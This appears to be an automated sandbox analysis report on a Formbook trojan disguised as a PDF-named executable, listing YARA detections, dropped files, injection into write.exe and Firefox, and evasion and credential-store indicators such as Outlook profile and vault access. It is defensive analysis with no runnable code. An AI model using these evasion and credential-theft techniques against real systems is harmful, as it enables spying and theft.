        Source: BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883268776.0000000000481000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamebagprojektionens golfer.exe6 vs BM-FM_NR.24040718PDF.exe
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13533970795.0000000036880000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BM-FM_NR.24040718PDF.exe
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewritej% vs BM-FM_NR.24040718PDF.exe
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13537482631.0000000036A34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BM-FM_NR.24040718PDF.exe
        Source: BM-FM_NR.24040718PDF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engine Classification label: mal96.troj.spyw.evad.winEXE@7/7@29/13
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404352
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Local\Temp\nseCCE4.tmp
        Source: BM-FM_NR.24040718PDF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: BM-FM_NR.24040718PDF.exe Virustotal: Detection: 12%
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File read: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
        Source: unknown Process created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Process created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
        Source: C:\Windows\SysWOW64\write.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: oleacc.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: version.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: riched20.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: usp10.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: msls31.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: Window Recorder, Window detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\write.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: BM-FM_NR.24040718PDF.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: write.pdbGCTL source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: write.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: wntdll.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: BM-FM_NR.24040718PDF.exe, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, write.exe
        Source: Binary string: mshtml.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp

        Data Obfuscation

        Source: Yara match, File source: 00000000.00000002.13454509223.0000000007965000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, File created: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Trophaeum.Uno
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Filantroper.ove
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold\Paleoatavistic.Rok179
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold\Hjrners133.txt
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold\princelings.bar
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\write.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, Code function: 2_2_36B21763 rdtsc 2_2_36B21763
        Source: C:\Windows\SysWOW64\write.exe, Window / User API: threadDelayed 9050
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, API coverage: 0.2 %
        Source: C:\Windows\SysWOW64\write.exe, API coverage: 2.6 %
        Source: C:\Windows\SysWOW64\write.exe TID: 1580, Thread sleep count: 119 > 30
        Source: C:\Windows\SysWOW64\write.exe TID: 1580, Thread sleep time: -238000s >= -30000s
        Source: C:\Windows\SysWOW64\write.exe TID: 1580, Thread sleep count: 9050 > 30
        Source: C:\Windows\SysWOW64\write.exe TID: 1580, Thread sleep time: -18100000s >= -30000s
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316, Thread sleep time: -120000s >= -30000s
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316, Thread sleep count: 39 > 30
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316, Thread sleep time: -58500s >= -30000s
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316, Thread sleep count: 58 > 30
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316, Thread sleep time: -58000s >= -30000s
        Source: C:\Windows\SysWOW64\write.exe, Last function: Thread delayed
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, Code function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, Code function: 0_2_00402688 FindFirstFileA,0_2_00402688
        Source: C:\Windows\SysWOW64\write.exe, Code function: 5_2_02FDB810 FindFirstFileW,FindNextFileW,FindClose,5_2_02FDB810
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13535224569.0000000006905000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, API call chain: ExitProcess graph end node graph_0-4276
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, API call chain: ExitProcess graph end node graph_0-4126
        Source: C:\Windows\SysWOW64\write.exe, Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\write.exe, Process queried: DebugPort
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, Code function: 2_2_36B234E0 NtCreateMutant,LdrInitializeThunk,2_2_36B234E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F4FD mov eax, dword ptr fs:[00000030h]2_2_36B9F4FD
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B094FA mov eax, dword ptr fs:[00000030h]2_2_36B094FA
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B154E0 mov eax, dword ptr fs:[00000030h]2_2_36B154E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h]2_2_36B014C9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h]2_2_36B014C9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h]2_2_36B014C9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h]2_2_36B014C9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h]2_2_36B014C9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9D430 mov eax, dword ptr fs:[00000030h]2_2_36B9D430
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9D430 mov eax, dword ptr fs:[00000030h]2_2_36B9D430
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB420 mov eax, dword ptr fs:[00000030h]2_2_36ADB420
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B17425 mov eax, dword ptr fs:[00000030h]2_2_36B17425
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B17425 mov ecx, dword ptr fs:[00000030h]2_2_36B17425
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7B420 mov eax, dword ptr fs:[00000030h]2_2_36B7B420
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7B420 mov eax, dword ptr fs:[00000030h]2_2_36B7B420
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h]2_2_36B6F42F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h]2_2_36B6F42F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h]2_2_36B6F42F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h]2_2_36B6F42F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h]2_2_36B6F42F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B69429 mov eax, dword ptr fs:[00000030h]2_2_36B69429
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F409 mov eax, dword ptr fs:[00000030h]2_2_36B9F409
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F478 mov eax, dword ptr fs:[00000030h]2_2_36B9F478
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD7460 mov eax, dword ptr fs:[00000030h]2_2_36AD7460
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD7460 mov eax, dword ptr fs:[00000030h]2_2_36AD7460
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1D450 mov eax, dword ptr fs:[00000030h]2_2_36B1D450
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1D450 mov eax, dword ptr fs:[00000030h]2_2_36B1D450
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h]2_2_36AED454
